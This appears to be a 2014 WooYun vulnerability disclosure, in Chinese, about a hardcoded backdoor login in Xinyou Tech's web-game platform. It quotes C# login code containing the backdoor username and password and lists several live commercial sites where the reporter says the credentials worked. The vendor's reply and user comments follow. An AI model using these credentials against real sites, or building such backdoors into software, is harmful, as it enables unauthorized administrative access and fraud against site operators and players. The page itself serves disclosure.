当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-048661

漏洞标题:信游科技页游平台程序通用型代码级后门账户(成功登录多个商业后台并可操纵订单和游戏)

相关厂商:52xinyou.cn

漏洞作者: wefgod

提交时间:2014-01-12 17:52

修复时间:2014-04-12 17:53

公开时间:2014-04-12 17:53

漏洞类型:非授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-01-12: 细节已通知厂商并且等待厂商处理中
2014-01-14: 厂商已经确认,细节仅向厂商公开
2014-01-17: 细节向第三方安全合作伙伴开放
2014-03-10: 细节向核心白帽子及相关领域专家公开
2014-03-20: 细节向普通白帽子公开
2014-03-30: 细节向实习白帽子公开
2014-04-12: 细节向公众公开

简要描述:

代码级的后门账户。做网页游戏收入还可以啊……

详细说明:

可能为测试用代码,未去掉,大部分商业用户的站点现在还可利用。而且如果是直接使用免费版的肯定是还没有改的。

漏洞证明:

先看Api/sys/login.ashx这个文件:

context.Response.ContentType = "text/plain";
        var _form_ = context.Request.Form;
        
        var uid = _form_["uid"];
        var pwd = _form_["pwd"];
        var rem = _form_["rem"];
        if (uid=="")
        {
            context.Response.Write("请输入用户名");
            return;
        }
        if (pwd == "")
        {
            context.Response.Write("请输入密码");
            return;
        }
        DataManage.UserEng ueng = new DataManage.UserEng();
var t = ueng.Login(uid, pwd, rem.ToLower() == "true");  //UserEng类的Login方法就是用来登录的


再跟进到UserEng.Login

public UserLogin Login(string uid, string upwd, bool rem)
        {
            UserLogin result;
            if (uid == "apwmaster_D7" && upwd == "apwmaster_d7")  //后门账户的用户名、密码!!!
            {
                IList<Apw_User> all = this.dataserver.GetAll<Apw_User>(EngSql.Ene("userlogin", "'" + uid + "'"));
                if (all.Count < 1)
                {
                    IList<Apw_User> all2 = this.dataserver.GetAll<Apw_User>("select * from Apw_User where u_GroupID in (select ID from SU_Group where gp_Key like '%sys_security%' and gp_Key like '%login_boss%')");
                    if (all2.Count < 1)
                    {
                        result = UserLogin.NoUser;
                        return result;
                    }
                    Apw_User apw_User = all2[0];
                    string strString = string.Concat(new object[]
                    {
                        apw_User.u_Account,
                        "$",
                        apw_User.u_RealName,
                        "$",
                        apw_User.u_Text,
                        "$",
                        apw_User.ID
                    });
                    string strValue = Utility.Encrypt3DES(strString, UserEng.lizablePwd);
                    Utility.SetCookie(UserEng.lizableName, strValue, 3);
                    result = UserLogin.OK;
                    return result;
                }
            }


if (uid == "apwmaster_D7" && upwd == "apwmaster_d7") 这句很明显了,根据后面的代码可以看出已经分配cookie了,所以肯定是后门账户
apwmaster_D7/ apwmaster_d7
测试一些官方给的案例(案例列表 http://52xinyou.cn/anli.htm )
http://www.12wan.com/account/default.aspx

image011.png


http://www.ailiuwa.com/account/default.aspx

image013.png


http://www.teiyi.com/account/default.aspx

image015.png


http://www.515you.com/account/default.aspx

image017.png


再放几个图,搞网页游戏收入还可以啊!所以安全工作还是要做到位啊

image019.png


image021.png

修复方案:

删除后门账户

版权声明:转载请注明来源 wefgod@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-01-14 11:53

厂商回复:

已经认领 这个系统是老版本系统 公开前会被淘汰 但是非常感激提出漏洞的白帽子们 已经联系乌云官方 准备做次活动 具体请留意官方公告 再次感谢 礼物已送

最新状态:

暂无

漏洞评价:

评论

  1. 2014-01-12 19:56 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    ......

  2. 2014-01-13 10:21 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @xsser 姐姐,你怎么了?

  3. 2014-01-14 15:15 | 阿布 ( 路人 | Rank:16 漏洞数:5 )

    前排围观 瓜子板凳

  4. 2014-01-14 17:02 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @阿布 打酱油路过一下

  5. 2014-01-15 15:28 | 信游科技页游(乌云厂商)

    这是源代码啊.他们技术自己发的吧.程序员是不是和公司闹变扭了.拿段测试代码就上来了.

  6. 2014-01-15 16:19 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @信游科技页游 不是,源码就是您的免费包里的啊!在官网下载的啊。

  7. 2014-01-15 16:21 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @信游科技页游 @xsser http://52xinyou.cn/%E4%BF%A1%E6%B8%B8%E5%85%8D%E8%B4%B9%E7%89%88.rar 这为什么成了他们自己技术发的了?

  8. 2014-01-15 16:40 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @wefgod ?

  9. 2014-01-15 16:56 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @xsser 没,厂商说是他们网站的技术自己发的(哥不是程序员啊),顺便拉你来围观下……看见源码很正常来的。随便反编译啊。